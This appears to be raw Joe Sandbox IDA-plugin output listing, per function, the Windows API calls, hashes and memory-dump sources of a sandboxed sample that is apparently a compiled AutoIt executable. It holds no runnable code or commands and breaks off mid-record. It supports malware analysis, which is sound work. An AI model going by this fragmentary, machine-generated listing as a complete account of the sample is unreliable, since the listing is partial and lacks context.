                                                                  • Instruction ID: 3403076b151b9e4663f5384122e93976929620dce138b4e7fd9b856b360ca1d7
                                                                  • Opcode Fuzzy Hash: 762565d1067c1a9ac6ccc4c4148e0e2165821e4236b68a06d0e63d957b8345b2
                                                                  • Instruction Fuzzy Hash: FD717CB1900509EFCB06CF98CC89EAEBB78FF85310F24C149F915AA255C770AA51CF62
                                                                  APIs
                                                                  • _memset.LIBCMT ref: 003B225A
                                                                  • _memset.LIBCMT ref: 003B2323
                                                                  • ShellExecuteExW.SHELL32(?), ref: 003B2368
                                                                    • Part of subcall function 0035936C: __swprintf.LIBCMT ref: 003593AB
                                                                    • Part of subcall function 0035936C: __itow.LIBCMT ref: 003593DF
                                                                    • Part of subcall function 0036C6F4: _wcscpy.LIBCMT ref: 0036C717
                                                                  • CloseHandle.KERNEL32(00000000), ref: 003B242F
                                                                  • FreeLibrary.KERNEL32(00000000), ref: 003B243E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: _memset$CloseExecuteFreeHandleLibraryShell__itow__swprintf_wcscpy
                                                                  • String ID: @
                                                                  • API String ID: 4082843840-2766056989
                                                                  • Opcode ID: 7460a561ee9162c9d17e1709e6b01da71cbe17ddfeba0dea268ae212f015db6a
                                                                  • Instruction ID: 3ccd425f956df910e208dfb59f41d9b2ec0250ba258b0c615fbdbef358440fbe
                                                                  • Opcode Fuzzy Hash: 7460a561ee9162c9d17e1709e6b01da71cbe17ddfeba0dea268ae212f015db6a
                                                                  • Instruction Fuzzy Hash: D771C174A00619DFCF06EF94C881AAEB7F5FF48304F018559E95AAB761CB34AD40CB90
                                                                  APIs
                                                                  • GetParent.USER32(?), ref: 00393DE7
                                                                  • GetKeyboardState.USER32(?), ref: 00393DFC
                                                                  • SetKeyboardState.USER32(?), ref: 00393E5D
                                                                  • PostMessageW.USER32(?,00000101,00000010,?), ref: 00393E8B
                                                                  • PostMessageW.USER32(?,00000101,00000011,?), ref: 00393EAA
                                                                  • PostMessageW.USER32(?,00000101,00000012,?), ref: 00393EF0
                                                                  • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00393F13
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: MessagePost$KeyboardState$Parent
                                                                  • String ID:
                                                                  • API String ID: 87235514-0
                                                                  • Opcode ID: bd3f61564eea2a33c78a252cfad63c38756de22ca81fda4486720e69c1268bfc
                                                                  • Instruction ID: 0c5ba5a4c041607d80fb0852f4565747e94364230fe8e29eea536251ce7604c9
                                                                  • Opcode Fuzzy Hash: bd3f61564eea2a33c78a252cfad63c38756de22ca81fda4486720e69c1268bfc
                                                                  • Instruction Fuzzy Hash: E451C2E1A047D53DFF3743248C55BBA7EA95B06304F098589F0D64A8C2D3A8EEC4D761
                                                                  APIs
                                                                  • GetParent.USER32(00000000), ref: 00393C02
                                                                  • GetKeyboardState.USER32(?), ref: 00393C17
                                                                  • SetKeyboardState.USER32(?), ref: 00393C78
                                                                  • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00393CA4
                                                                  • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00393CC1
                                                                  • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00393D05
                                                                  • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00393D26
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: MessagePost$KeyboardState$Parent
                                                                  • String ID:
                                                                  • API String ID: 87235514-0
                                                                  • Opcode ID: 808c3f3e0b91623d6df1a3aaaf4ec588c9b8564269a63674cc11191a038e0156
                                                                  • Instruction ID: 180ed3e1e0a55e1960bf5dfa166a5737fb11185e38f10b3136dffebabd3e0ca5
                                                                  • Opcode Fuzzy Hash: 808c3f3e0b91623d6df1a3aaaf4ec588c9b8564269a63674cc11191a038e0156
                                                                  • Instruction Fuzzy Hash: A451F7E05087D53DFF3383748C55BB6BFA9AF06300F088489E0D55A8C2D694EE84EB61
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: _wcsncpy$LocalTime
                                                                  • String ID:
                                                                  • API String ID: 2945705084-0
                                                                  • Opcode ID: de57fb8cab216b7f1e9ebe7767a6a7ecabbc4e143a86d75c1d5c297a2716169f
                                                                  • Instruction ID: db45dbf619242ce8f09b5ad4d6d3c7e6cfbb187270fc41323fcf9bafbfb74532
                                                                  • Opcode Fuzzy Hash: de57fb8cab216b7f1e9ebe7767a6a7ecabbc4e143a86d75c1d5c297a2716169f
                                                                  • Instruction Fuzzy Hash: 67416F66C20214B6DF22EBF4CC869CFB3AC9F04310F518966E519F7161FA38E61483A5
                                                                  APIs
                                                                  • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?), ref: 003B3DA1
                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 003B3DCB
                                                                  • FreeLibrary.KERNEL32(00000000), ref: 003B3E80
                                                                    • Part of subcall function 003B3D72: RegCloseKey.ADVAPI32(?), ref: 003B3DE8
                                                                    • Part of subcall function 003B3D72: FreeLibrary.KERNEL32(?), ref: 003B3E3A
                                                                    • Part of subcall function 003B3D72: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 003B3E5D
                                                                  • RegDeleteKeyW.ADVAPI32(?,?), ref: 003B3E25
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                                  • String ID:
                                                                  • API String ID: 395352322-0
                                                                  • Opcode ID: cd3ff994acf18ac0030b3eb258aaaf9379dd7e0edc2c0f55b5575216aff7bda1
                                                                  • Instruction ID: e9c81f596e7ad165f2f1eec78de3d6935c812671855b3e014451f7aec22ac016
                                                                  • Opcode Fuzzy Hash: cd3ff994acf18ac0030b3eb258aaaf9379dd7e0edc2c0f55b5575216aff7bda1
                                                                  • Instruction Fuzzy Hash: 1231CBB2901119BFDB169F94EC85AFFB7BCEF08304F00416AE612E6550DB749F499BA0
                                                                  APIs
                                                                  • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 003B8FE7
                                                                  • GetWindowLongW.USER32(00FB0490,000000F0), ref: 003B901A
                                                                  • GetWindowLongW.USER32(00FB0490,000000F0), ref: 003B904F
                                                                  • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 003B9081
                                                                  • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 003B90AB
                                                                  • GetWindowLongW.USER32(00000000,000000F0), ref: 003B90BC
                                                                  • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 003B90D6
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: LongWindow$MessageSend
                                                                  • String ID:
                                                                  • API String ID: 2178440468-0
                                                                  • Opcode ID: 98596faa9c8052d880b9a5ef4329a2d133b9d93f95137e97ed363301a900dee0
                                                                  • Instruction ID: 71a0a14d433f8b75edfdf435f96a9e3131fc87aa90e0098ed794a96ea7ff6f23
                                                                  • Opcode Fuzzy Hash: 98596faa9c8052d880b9a5ef4329a2d133b9d93f95137e97ed363301a900dee0
                                                                  • Instruction Fuzzy Hash: FA315734644215EFDB22DF58EC84FA437A9FB4A318F154166F7198F6B1CB72A840CB84
                                                                  APIs
                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 003908F2
                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00390918
                                                                  • SysAllocString.OLEAUT32(00000000), ref: 0039091B
                                                                  • SysAllocString.OLEAUT32(?), ref: 00390939
                                                                  • SysFreeString.OLEAUT32(?), ref: 00390942
                                                                  • StringFromGUID2.OLE32(?,?,00000028), ref: 00390967
                                                                  • SysAllocString.OLEAUT32(?), ref: 00390975
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                  • String ID:
                                                                  • API String ID: 3761583154-0
                                                                  • Opcode ID: 6249a10a36160119c7aaafa6bef47747cd7a989d4e1c3c58c728e9e6a35e52a0
                                                                  • Instruction ID: 3c4e7bf853e0c3fa00c6ec76130abab7f9738688925055bdc8b91fa5f3f81a6b
                                                                  • Opcode Fuzzy Hash: 6249a10a36160119c7aaafa6bef47747cd7a989d4e1c3c58c728e9e6a35e52a0
                                                                  • Instruction Fuzzy Hash: 7221B572601218AFAF119F6CDC88DBB77BCEB09360B008126F915DB161DB70ED41CB60
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: __wcsnicmp
                                                                  • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                  • API String ID: 1038674560-2734436370
                                                                  • Opcode ID: d0c114240920bdca6c811a77e47537994605e08b5da780fb8124421bb29aac9b
                                                                  • Instruction ID: aaa898aed6b85bc4bbbafb370a5ca8ef0934df2df105d4803d52ef80840c03e1
                                                                  • Opcode Fuzzy Hash: d0c114240920bdca6c811a77e47537994605e08b5da780fb8124421bb29aac9b
                                                                  • Instruction Fuzzy Hash: 54214C72104A5177CB33A636DC12FBBB39CEF66300F618025F84A9B186E6559D41C395
                                                                  APIs
                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 003909CB
                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 003909F1
                                                                  • SysAllocString.OLEAUT32(00000000), ref: 003909F4
                                                                  • SysAllocString.OLEAUT32 ref: 00390A15
                                                                  • SysFreeString.OLEAUT32 ref: 00390A1E
                                                                  • StringFromGUID2.OLE32(?,?,00000028), ref: 00390A38
                                                                  • SysAllocString.OLEAUT32(?), ref: 00390A46
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                  • String ID:
                                                                  • API String ID: 3761583154-0
                                                                  • Opcode ID: ff325c950412eb9e4a449a4780e203420fcf435baec3dc1a49fa609415b896c5
                                                                  • Instruction ID: 954da8647b436397147ad8acec9c60596790348939bfd20b8063c7fb4ad8fd10
                                                                  • Opcode Fuzzy Hash: ff325c950412eb9e4a449a4780e203420fcf435baec3dc1a49fa609415b896c5
                                                                  • Instruction Fuzzy Hash: F0218675601204AFDF16DFA9DD88DAA77ECEF09360B018126F909CB2A5DA70EC418764
                                                                  APIs
                                                                    • Part of subcall function 0036D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0036D1BA
                                                                    • Part of subcall function 0036D17C: GetStockObject.GDI32(00000011), ref: 0036D1CE
                                                                    • Part of subcall function 0036D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 0036D1D8
                                                                  • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 003BA32D
                                                                  • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 003BA33A
                                                                  • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 003BA345
                                                                  • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 003BA354
                                                                  • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 003BA360
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$CreateObjectStockWindow
                                                                  • String ID: Msctls_Progress32
                                                                  • API String ID: 1025951953-3636473452
                                                                  • Opcode ID: 755baa688f9e9e9d90ff4288fe8fda68d04919945f3cc31ac0c904791738a6d3
                                                                  • Instruction ID: 45ddf92529fb27cdd4b161193f2092976874a3585ed8bfc0c2c3f23cc214a888
                                                                  • Opcode Fuzzy Hash: 755baa688f9e9e9d90ff4288fe8fda68d04919945f3cc31ac0c904791738a6d3
                                                                  • Instruction Fuzzy Hash: B611D0B1150219BEEF115F60CC85EEB7F6DFF08398F014115BB08A60A0C7729C21DBA4
                                                                  APIs
                                                                  • GetClientRect.USER32(?,?), ref: 0036CCF6
                                                                  • GetWindowRect.USER32(?,?), ref: 0036CD37
                                                                  • ScreenToClient.USER32(?,?), ref: 0036CD5F
                                                                  • GetClientRect.USER32(?,?), ref: 0036CE8C
                                                                  • GetWindowRect.USER32(?,?), ref: 0036CEA5
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: Rect$Client$Window$Screen
                                                                  • String ID:
                                                                  • API String ID: 1296646539-0
                                                                  • Opcode ID: 594327a950781e2e3e4cb66d2fc1a83ae76ec0d849a76be5f893784fb72e10f3
                                                                  • Instruction ID: 7716df47e6a9e4484374cdf036da6725520942f0d08ac75c2aa5c6e00f8bfdd4
                                                                  • Opcode Fuzzy Hash: 594327a950781e2e3e4cb66d2fc1a83ae76ec0d849a76be5f893784fb72e10f3
                                                                  • Instruction Fuzzy Hash: F5B15979910249DBDB11CFA8C480BEDBBB5FF08300F15D129EC99EB654DB31A950CBA4
                                                                  APIs
                                                                  • CreateToolhelp32Snapshot.KERNEL32 ref: 003B1C18
                                                                  • Process32FirstW.KERNEL32(00000000,?), ref: 003B1C26
                                                                  • __wsplitpath.LIBCMT ref: 003B1C54
                                                                    • Part of subcall function 00371DFC: __wsplitpath_helper.LIBCMT ref: 00371E3C
                                                                  • _wcscat.LIBCMT ref: 003B1C69
                                                                  • Process32NextW.KERNEL32(00000000,?), ref: 003B1CDF
                                                                  • CloseHandle.KERNEL32(00000000,?,?,00000002,00000000), ref: 003B1CF1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath__wsplitpath_helper_wcscat
                                                                  • String ID:
                                                                  • API String ID: 1380811348-0
                                                                  • Opcode ID: 3fcdc0c72c413e4c4b146d8719794d797af9e4bc6c486e51653fd2d93baf752d
                                                                  • Instruction ID: 7d281ee0774aeb0a4e65435876c7be968c33790aa9ec1120a454e38f36333359
                                                                  • Opcode Fuzzy Hash: 3fcdc0c72c413e4c4b146d8719794d797af9e4bc6c486e51653fd2d93baf752d
                                                                  • Instruction Fuzzy Hash: 2C515D715043409FD722EF64D895EABB7ECEF88754F00491EF9899B2A1DB709A04CB92
                                                                  APIs
                                                                    • Part of subcall function 003B3C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,003B2BB5,?,?), ref: 003B3C1D
                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 003B30AF
                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 003B30EF
                                                                  • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 003B3112
                                                                  • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 003B313B
                                                                  • RegCloseKey.ADVAPI32(?,?,00000000), ref: 003B317E
                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 003B318B
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                                  • String ID:
                                                                  • API String ID: 3451389628-0
                                                                  • Opcode ID: 0cf67832577a5141d365812ec6a8766b0d00ebe543077ffecc4044ef78702af3
                                                                  • Instruction ID: ba3bb62bf8f92754ffefed021b316bb49c60e3e2489fc93bda1e20b8e1cdb59c
                                                                  • Opcode Fuzzy Hash: 0cf67832577a5141d365812ec6a8766b0d00ebe543077ffecc4044ef78702af3
                                                                  • Instruction Fuzzy Hash: 88514D31118310AFC716EF68C885EAABBF9FF89304F04491DFA558B1A1DB71DA09CB52
                                                                  APIs
                                                                  • GetMenu.USER32(?), ref: 003B8540
                                                                  • GetMenuItemCount.USER32(00000000), ref: 003B8577
                                                                  • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 003B859F
                                                                  • GetMenuItemID.USER32(?,?), ref: 003B860E
                                                                  • GetSubMenu.USER32(?,?), ref: 003B861C
                                                                  • PostMessageW.USER32(?,00000111,?,00000000), ref: 003B866D
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: Menu$Item$CountMessagePostString
                                                                  • String ID:
                                                                  • API String ID: 650687236-0
                                                                  • Opcode ID: 2dd78315d3c8d25ccdc0e4a6cc6042e38cb199bdb084d2dbfd1a3c3ce2a41e27
                                                                  • Instruction ID: 329265dc3b6d4fdfb099ee0af7767bc825ee036f8c156a137628fc8d8a979b13
                                                                  • Opcode Fuzzy Hash: 2dd78315d3c8d25ccdc0e4a6cc6042e38cb199bdb084d2dbfd1a3c3ce2a41e27
                                                                  • Instruction Fuzzy Hash: 52518B35A00219EFCF12EF64C841AEEB7F8AF48314F15445AEA16BB351CB30AE41CB90
                                                                  APIs
                                                                  • _memset.LIBCMT ref: 00394B10
                                                                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00394B5B
                                                                  • IsMenu.USER32(00000000), ref: 00394B7B
                                                                  • CreatePopupMenu.USER32 ref: 00394BAF
                                                                  • GetMenuItemCount.USER32(000000FF), ref: 00394C0D
                                                                  • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00394C3E
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                  • String ID:
                                                                  • API String ID: 3311875123-0
                                                                  • Opcode ID: 0cecd7e260219a744896c1cdaff275a7e9aeff4a738f8dec41a6f618ed9df20d
                                                                  • Instruction ID: b431e218e07425ff3d7c022db9b12e8a941a8a970b33280d2c24b84a2865e026
                                                                  • Opcode Fuzzy Hash: 0cecd7e260219a744896c1cdaff275a7e9aeff4a738f8dec41a6f618ed9df20d
                                                                  • Instruction Fuzzy Hash: 3B51CE70602309EFDF26CF68D888FAEBBF8AF45318F148159E4659B291E3709946CF51
                                                                  APIs
                                                                  • select.WSOCK32(00000000,00000001,00000000,00000000,?,000003E8,003EDC00), ref: 003A8E7C
                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 003A8E89
                                                                  • __WSAFDIsSet.WSOCK32(00000000,00000001,00000000), ref: 003A8EAD
                                                                  • #16.WSOCK32(?,?,00000000,00000000), ref: 003A8EC5
                                                                  • _strlen.LIBCMT ref: 003A8EF7
